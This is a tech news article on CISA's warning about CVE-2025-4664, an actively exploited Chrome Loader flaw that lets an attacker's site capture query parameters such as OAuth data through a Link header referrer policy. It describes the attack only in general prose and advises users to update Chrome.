Netvora logo
Submit Startup Subscribe
Home About Contact Submit Startup Subscribe

Active Exploitation of Chrome Vulnerability Allows Account Hijacking

Comment

Active Exploitation of Chrome Vulnerability Allows Account Hijacking

Netvora May 16, 2025 at 12:00 PM Security
Active Exploitation of Chrome Vulnerability Allows Account Hijacking

Active Exploitation of Chrome Vulnerability Allows Account Hijacking

By Netvora Tech News

The Cybersecurity and Infrastructure Security Agency (CISA) of the US Department of Homeland Security has issued a warning about an actively exploited vulnerability in Google Chrome that allows attackers to steal sensitive data from users' accounts. The vulnerability, identified as CVE-2025-4664, was discovered in the browser's Loader component, which failed to properly enforce policies. A security researcher, Vsevolod Kokorin, first highlighted the issue on May 5, explaining that the problem lies in the Link-header, which can be configured to set a referrer policy. An attacker can use this to specify an unsafe URL and capture the entire query parameter, which can contain sensitive data such as OAuth flow information. This can lead to account takeover. The CISA maintains an online catalog of actively exploited vulnerabilities, and CVE-2025-4664 has been added to this list. However, details about the observed attacks are not publicly available. The US government has instructed its agencies to update their installations of Google Chrome by June 5. Google has confirmed that the security update will be rolled out to users over the coming days and weeks. For users who cannot wait, a manual update is available.

How the Vulnerability Works

The vulnerability allows an attacker to steal sensitive data from a user's browser by exploiting the Link-header. Here's a step-by-step explanation of how it works:

  • An attacker creates a specially prepared website that can capture the entire query parameter.
  • The attacker sets the Link-header to specify an unsafe URL.
  • The browser sends the query parameter to the attacker's website, which can contain sensitive data such as OAuth flow information.
  • The attacker can use this information to hijack the user's account.

What Users Can Do

To protect themselves from this vulnerability, users can take the following steps:

  • Update their Google Chrome installations as soon as possible.
  • Use a manual update if they cannot wait for the automatic rollout.
  • Be cautious when opening links from unknown sources and avoid visiting suspicious websites.
By taking these steps, users can minimize the risk of falling victim to this actively exploited vulnerability and protect their sensitive data.

Comments (0)

Leave a comment

Back to homepage

You might also like